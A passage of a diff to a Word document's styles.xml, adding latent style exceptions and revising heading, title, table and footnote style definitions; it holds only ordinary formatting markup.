+    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
+    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
+    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
+    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
+    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
+    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
+    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
+    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
+  </w:latentStyles>
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
+    <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rPr>
-      <w:sz w:val="56"/>
-      <w:szCs w:val="56"/>
-    </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
-    <w:name w:val="Heading 1"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:name w:val="heading 1"/>
+    <w:uiPriority w:val="9"/>
     <w:qFormat/>
+    <w:pPr>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
     <w:rPr>
       <w:color w:val="2E74B5"/>
       <w:sz w:val="32"/>
@@ -6582,10 +7420,14 @@
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading2">
-    <w:name w:val="Heading 2"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:name w:val="heading 2"/>
+    <w:uiPriority w:val="9"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:pPr>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
     <w:rPr>
       <w:color w:val="2E74B5"/>
       <w:sz w:val="26"/>
@@ -6593,10 +7435,14 @@
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading3">
-    <w:name w:val="Heading 3"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:name w:val="heading 3"/>
+    <w:uiPriority w:val="9"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:pPr>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
     <w:rPr>
       <w:color w:val="1F4D78"/>
       <w:sz w:val="24"/>
@@ -6604,10 +7450,14 @@
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading4">
-    <w:name w:val="Heading 4"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:name w:val="heading 4"/>
+    <w:uiPriority w:val="9"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:pPr>
+      <w:outlineLvl w:val="3"/>
+    </w:pPr>
     <w:rPr>
       <w:i/>
       <w:iCs/>
@@ -6615,27 +7465,69 @@
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading5">
-    <w:name w:val="Heading 5"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:name w:val="heading 5"/>
+    <w:uiPriority w:val="9"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:pPr>
+      <w:outlineLvl w:val="4"/>
+    </w:pPr>
     <w:rPr>
       <w:color w:val="2E74B5"/>
     </w:rPr>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading6">
-    <w:name w:val="Heading 6"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+    <w:name w:val="heading 6"/>
+    <w:uiPriority w:val="9"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:pPr>
+      <w:outlineLvl w:val="5"/>
+    </w:pPr>
     <w:rPr>
       <w:color w:val="1F4D78"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Strong">
-    <w:name w:val="Strong"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
+  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
+    <w:name w:val="Default Paragraph Font"/>
+    <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
+    <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Title">
+    <w:name w:val="Title"/>
+    <w:uiPriority w:val="10"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:sz w:val="56"/>
+      <w:szCs w:val="56"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Strong1">
+    <w:name w:val="Strong1"/>
     <w:qFormat/>
     <w:rPr>
       <w:b/>
@@ -6644,12 +7536,10 @@
   </w:style>
   <w:style w:type="paragraph" w:styleId="ListParagraph">
     <w:name w:val="List Paragraph"/>
-    <w:basedOn w:val="Normal"/>
     <w:qFormat/>
   </w:style>
   <w:style w:type="character" w:styleId="Hyperlink">
     <w:name w:val="Hyperlink"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:rPr>
@@ -6659,7 +7549,6 @@
   </w:style>
   <w:style w:type="character" w:styleId="FootnoteReference">
     <w:name w:val="footnote reference"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -6669,22 +7558,13 @@
   </w:style>
   <w:style w:type="paragraph" w:styleId="FootnoteText">
     <w:name w:val="footnote text"/>
-    <w:basedOn w:val="Normal"/>
     <w:link w:val="FootnoteTextChar"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:pPr>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-    </w:pPr>
-    <w:rPr>
-      <w:sz w:val="20"/>
-      <w:szCs w:val="20"/>
-    </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="FootnoteTextChar">
+  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
     <w:name w:val="Footnote Text Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
